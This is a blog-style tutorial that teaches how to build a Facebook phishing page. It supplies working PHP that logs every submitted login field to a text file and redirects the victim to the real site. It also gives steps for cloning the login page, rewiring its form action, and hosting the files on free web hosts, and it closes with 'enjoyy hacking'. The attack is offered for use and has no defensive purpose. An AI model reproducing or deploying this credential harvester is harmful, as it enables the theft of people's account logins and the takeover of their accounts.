HOW TO MAKE PHISHING PAGE | FACEBOOK HACKING


hello every one....,  in this tutorial we learn.. how to make a phishing page of any website....






in this tutorial i am making phishing page of facebook , its just for an example that how to make phishing page.., you can also make any other websites's phishing page...,



so lets start....,


files you need...

.php
.txt
.html

.php FILE : 

this is the main file of phishing.., this file redirects the user to the original website of phishing page...
also.. it saves email id and password to a txt file, which  user enters in our phishing page.

.txt FILE :

this is a simple text file... which means to store the email id and password.

.html FILE :

this is our login page..., 
we will discuss about it later.....,,



FIRST OF ALL....,

open notepad-
copy below lines and save it as anyname.php
in my case i saved it as phishing.php



<?php
header ('Location: https://www.facebook.com/login.php?login_attempt=1 ');
$handle = fopen("password.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>



NOW...

again open notepad and leave it blank, save it as password.txt



MODIFY LOGIN PAGE :

STEP 1

Go to facebook.com 
right click on the log in page
click on view source code
select all
copy
and paste it to notepad
save it anyname.html
suppose we save it as facebook_login.html

STEP 2:

righ click on the facebook_login.html and click on edit
now press Ctrl + F (find)
type- action
you will find an link- https://www.facebook.com/login.php?login_attempt=1

replace this link to our php file name..,,
example - if our php file name is phishing.php

                then it should be action="phishing.php"

save the file !!!

Now we have 3 files..,

password.txt
facebook_login.html
phishing.php

OR you can directly download files here

The next step is to host these three files on internet...,

go to any free web hosting site,

like-
www.110mb.com/
www.000webhost.com/
www.5gbfree.com/

create an account 
and upload these files at same directory......,

once it is uploaded..

click on facebook_login.html
u'll see facebook login page....,

now enter email id and password and click on log in..

now open password.txt

u'll find the email id and password....,

enjoyy hacking...,,,

This entry was posted in

    Category

    Category

    Category